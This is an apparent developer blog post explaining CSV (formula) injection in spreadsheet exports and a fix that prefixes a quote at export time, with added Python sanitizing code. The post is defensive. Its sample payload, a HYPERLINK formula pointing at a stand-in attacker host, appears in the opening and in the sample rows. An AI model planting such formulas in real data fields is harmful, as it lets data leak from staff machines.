CSV Injection: The Export Button That Runs Code

A customer enters their name. They type =HYPERLINK("http://evil.example/leak", "click"). Your system accepts it. It looks like plain text.

Weeks later, your finance team exports a customer list to CSV. They open the file in Excel. That cell is no longer text. It is a formula.

This is CSV injection. People also call it formula injection. It is a common bug in e-commerce panels. Most teams do not test for it.

Spreadsheet apps do not treat every cell as text. If a cell starts with =, +, -, or @, Excel or Google Sheets reads it as a formula.

A formula can do more than math. It can build a URL. It can reach out to a network. In some cases, it can launch commands on a computer.

The data stays text in your database. It becomes executable the moment a human opens the file. Usually, the victim is a staff member with high access levels.

You are at risk anywhere you export user data:

  • Customer name and address exports
  • Order grids exported to CSV
  • Product feeds from vendors
  • Contact form dumps

An attacker does not need admin access. They set their own name as a formula and wait.

Do not try to fix this during input validation. The value is legitimate text until a spreadsheet reads it. Instead, sanitize the data when you write the CSV file.

If a cell starts with =, +, -, @, a tab, or a carriage return, add a single quote to the front.

Example logic: If the value starts with a trigger character, return "'" + value.

The single quote tells the spreadsheet to treat the cell as text. The spreadsheet hides the quote from the user. Run every field through this check before it enters the file.
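An added example of the export-time check described above (example code, not taken from the post): a sanitize_cell function that prefixes a single quote when the first character is one of the trigger characters, plus an export_rows helper that runs every field through it before the csv module writes the row. The SAMPLE_ROWS data is constructed for the demonstration.

```python
import csv
import io

# First characters that make Excel or Google Sheets parse a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def sanitize_cell(value):
    """Neutralise one cell at the CSV boundary.

    If the text starts with a trigger character, prefix a single quote so the
    spreadsheet treats the cell as a literal string. Non-string values are
    converted to text first so the check always sees the real first character
    (a negative number such as -5 therefore also becomes text: "'-5").
    """
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(rows):
    """Return CSV text for rows, sanitising every field before it is written."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([sanitize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample: an ordinary customer and one whose "name" is the
# hyperlink formula quoted in the post.
SAMPLE_ROWS = [
    ["name", "city"],
    ["Alice Example", "Berlin"],
    ['=HYPERLINK("http://evil.example/leak", "click")', "@home"],
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS))
```

The check is applied to every cell, including headers, so a trigger character is never the first byte of any field in the file.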

Do not escape data in your database. The value is fine in your database and fine in your HTML. It is only dangerous in a CSV. Guard the CSV boundary to keep your data clean elsewhere.

Stop trusting your internal exports. Attackers target your staff through these files.

CSV injection does not trigger scary scanner alerts. It hides in the export button you built years ago. Check your CSV export code now. If you do not guard the first character of every cell, you are at risk.

Source: https://dev.to/iamrobindhiman/csv-injection-the-export-button-that-runs-code-on-someone-elses-machine-3ki6